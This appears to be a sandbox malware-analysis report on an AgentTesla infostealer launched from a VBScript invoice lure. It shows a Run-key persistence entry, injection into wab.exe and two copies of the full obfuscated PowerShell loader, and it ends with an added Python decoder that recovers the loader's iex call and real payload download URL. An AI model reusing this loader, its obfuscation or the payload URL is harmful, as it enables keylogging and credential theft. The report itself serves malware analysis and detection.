memory/4456-49-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/5016-50-0x0000000024850000-0x00000000248A0000-memory.dmp

memory/5016-51-0x0000000024940000-0x00000000249D2000-memory.dmp

memory/5016-52-0x0000000024930000-0x000000002493A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 09:18

Reported

2024-06-03 09:20

Platform

win7-20240221-en

Max time kernel

141s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1964 set thread context of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2952 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
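
Both PowerShell stages above (the 64-bit one under WScript and the SysWOW64 one it spawns) run the same script, and every string in it is hidden behind `Acarpelous`: the routine returns the character at offset 5 of each 6-character frame and never reads the literal's last character, and `Sulfide` hands the result to `iex` (itself the decoded value of `$Rorgngeres204`). The Python below is an added example, not code from the report or from the sample: it ports the decoder, pulls each `$var = Acarpelous '...'` assignment out of a script excerpt, and refuses any literal whose length is not a multiple of six, which is how a literal that has lost characters shows up. The excerpt is constructed here from four literals copied verbatim from the command line above. The length check matters on this very page: the report viewer collapses repeated spaces inside the command line, so the `$Illumination` (User-Agent) literal as printed decodes correctly only as far as `Mozilla/5.0` and then turns into junk; the four literals used below are intact.

```python
import re

# Added example: a Python port of the `Acarpelous` decoder from the PowerShell
# stage in this report. The original routine, for reference:
#   $Oisen = $refried.Length - 1
#   For ($i = 5; $i -lt $Oisen; $i += 6) { $out += $refried.Substring($i, 1) }
# One payload character sits at offset 5 of every 6-character frame; the
# literal's final character is never read.

FRAME = 6
PAYLOAD_OFFSET = 5

# Literals copied verbatim from the command line in this report (not constructed).
LIT_RORGNGERES204 = "Elefai Te.teVegetxEn ar "
LIT_FESTSTEMNING = "To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst "
LIT_SPRINGDANSES = (
    r"Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist"
    r"%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa "
    r"Ejac,eFhovecpr enh ransoBdell Skrnetaaret "
)
LIT_PROMINENCES = (
    "Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. "
    "ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e "
)

# Constructed script excerpt: the four literals above in the same
# `$name=Acarpelous '...'` form the sample uses, for the scanner to work on.
SCRIPT_EXCERPT = (
    "$Rorgngeres204=Acarpelous '" + LIT_RORGNGERES204 + "';"
    + "$feststemning=Acarpelous '" + LIT_FESTSTEMNING + "';"
    + "$Prominences=Acarpelous '" + LIT_PROMINENCES + "';"
    + "$Springdanses = Acarpelous '" + LIT_SPRINGDANSES + "';"
)

# `$Name = Acarpelous '<single-quoted PowerShell literal>'`; '' is an escaped quote.
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*Acarpelous\s+'((?:[^']|'')*)'")


def acarpelous(literal: str) -> str:
    """Straight port: every 6th character from offset 5, never the last one."""
    return "".join(literal[i] for i in range(PAYLOAD_OFFSET, len(literal) - 1, FRAME))


def is_well_formed(literal: str) -> bool:
    """Every literal checked in this sample is N frames of 6 plus one unread
    trailing character, so its length is a multiple of 6. Any other length
    means characters were lost in transit (for example a viewer collapsing a
    run of spaces); the frame is then shifted from the point of loss onward
    and the decoder emits filler letters instead of the payload."""
    return len(literal) >= FRAME and len(literal) % FRAME == 0


def decode_literal(literal: str):
    """Decode one literal, or return None when it cannot be trusted."""
    if not is_well_formed(literal):
        return None
    return acarpelous(literal)


def decode_assignments(script: str) -> dict:
    """Map each `$Name = Acarpelous '...'` assignment to its decoded value."""
    return {
        name: decode_literal(raw.replace("''", "'"))
        for name, raw in _ASSIGN.findall(script)
    }


if __name__ == "__main__":
    for name, value in decode_assignments(SCRIPT_EXCERPT).items():
        print("$" + name + " = " + repr(value))
```

Decoded, `$Rorgngeres204` is `iex`, `$feststemning` is `User-Agent`, `$Springdanses` is the `echo %appdata%\Skrmet.Kli && echo t` command that appears as the cmd.exe process above, and `$Prominences` is `https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/Udplantningen.u32`, whose host is the one contacted in the Network section. The file name resolved by that `echo` is the `Skrmet.Kli` written under `C:\Users\Admin\AppData\Roaming` in the Files section. Deleting a single character from a literal (the space before `Forvi` in `$Prominences`, say) makes `decode_literal` return `None` rather than a plausible-looking but wrong string.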

C:\Windows\SysWOW64\cmd.exe

